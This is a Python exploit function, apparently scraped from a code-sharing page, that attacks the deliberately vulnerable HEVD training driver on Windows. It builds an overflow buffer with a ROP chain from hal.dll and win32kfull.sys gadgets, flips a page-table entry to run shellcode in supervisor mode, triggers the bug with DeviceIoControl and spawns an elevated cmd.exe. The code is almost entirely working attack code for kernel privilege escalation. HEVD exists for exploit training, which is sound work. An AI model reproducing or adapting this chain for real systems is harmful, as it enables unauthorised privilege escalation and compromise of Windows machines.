def trigger_stack_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
sys.exit()
base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
hal_base_address = base_addresses[0]
win32kfull_base_address = base_addresses[1]
shellcode_ptr = virtual_alloc_payload()
debug_print ("[+] Constructing malicious buffer w/ ROP chain")
evil_input = "\x41" * 0x808 # junk
evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN
evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode
evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN
evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3
evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN
evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache
evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 32
debug_print ("[+] Buf size: 0x%X" % evil_size)
debug_print ("[+] Sending malicious buffer")
debug_print ("[+] Triggering vuln ..")
kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
debug_print ("[*] Enjoy Elevated Privs !\n")
os.system('cmd.exe')
else:
debug_print ("[!] Exploit did not work. Re-run it!")
HEVD_stackoverflow.py 文件源码
python
阅读 24
收藏 0
点赞 0
评论 0
评论列表
文章目录
